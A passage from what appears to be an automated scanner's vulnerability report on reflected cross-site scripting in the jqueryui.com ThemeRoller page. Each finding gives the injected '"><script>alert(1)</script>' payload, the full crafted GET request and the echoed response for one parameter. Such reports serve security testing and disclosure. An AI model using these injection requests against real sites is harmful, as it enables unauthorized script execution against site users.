mgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=759d510"><script>alert(1)</script>ecb5ac790e0&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=4
...[SNIP]...

2.41. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5155"><script>alert(1)</script>7fc8fd270e6 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0b5155"><script>alert(1)</script>7fc8fd270e6&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0b5155"><script>alert(1)</script>7fc8fd270e6&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

2.42. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5153"><script>alert(1)</script>c40354ad18f was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0b5153"><script>alert(1)</script>c40354ad18f&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0b5153"><script>alert(1)</script>c40354ad18f&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.43. http://jqueryui.com/themeroller/ [bgTextureActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b38f"><script>alert(1)</script>e88a1ca4744 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png8b38f"><script>alert(1)</script>e88a1ca4744&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png8b38f"><script>alert(1)</script>e88a1ca4744&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

2.44. http://jqueryui.com/themeroller/ [bgTextureContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cea95"><script>alert(1)</script>1eeea06abb0 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.pngcea95"><script>alert(1)</script>1eeea06abb0&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.pngcea95"><script>alert(1)</script>1eeea06abb0&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&
...[SNIP]...

2.45. http://jqueryui.com/themeroller/ [bgTextureDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fc0e"><script>alert(1)</script>8558d7e3ed7 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png8fc0e"><script>alert(1)</script>8558d7e3ed7&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png8fc0e"><script>alert(1)</script>8558d7e3ed7&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=
...[SNIP]...

2.46. http://jqueryui.com/themeroller/ [bgTextureError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bebe2"><script>alert(1)</script>50e8d52cb34 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.pngbebe2"><script>alert(1)</script>50e8d52cb34&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.pngbebe2"><script>alert(1)</script>50e8d52cb34&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

2.47. http://jqueryui.com/themeroller/ [bgTextureHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b224"><script>alert(1)</script>3defc719190 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png1b224"><script>alert(1)</script>3defc719190&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png1b224"><script>alert(1)</script>3defc719190&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffff
...[SNIP]...

2.48. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6094c"><script>alert(1)</script>a35bfbf3e53 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png6094c"><script>alert(1)</script>a35bfbf3e53&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png6094c"><script>alert(1)</script>a35bfbf3e53&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcEr
...[SNIP]...

2.49. http://jqueryui.com/themeroller/ [bgTextureHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af8d6"><script>alert(1)</script>cb13d41972f was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.pngaf8d6"><script>alert(1)</script>cb13d41972f&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
